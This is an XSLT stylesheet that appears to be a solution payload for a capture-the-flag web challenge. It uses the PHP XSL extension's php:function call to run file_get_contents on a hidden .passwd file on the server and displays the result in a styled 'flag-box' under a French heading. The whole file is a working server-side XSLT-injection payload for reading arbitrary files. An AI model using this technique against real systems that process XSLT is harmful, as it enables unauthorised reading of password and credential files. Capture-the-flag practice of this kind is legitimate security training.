<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<xsl:template match="/">
  <html>
    <head>
      <style>
        body { font-family: monospace; background: #222; color: #0f0; padding: 20px; }
        .flag-box { border: 2px solid #0f0; padding: 15px; display: inline-block; }
      </style>
    </head>
    <body>
      <h3>Contenu du fichier .passwd :</h3>
      <div class="flag-box">
        <xsl:value-of select="php:function('file_get_contents', '/challenge/web-serveur/ch50/.6ff3200bee785801f420fba826ffcdee/.passwd')"/>
      </div>
    </body>
  </html>
</xsl:template>
</xsl:stylesheet>
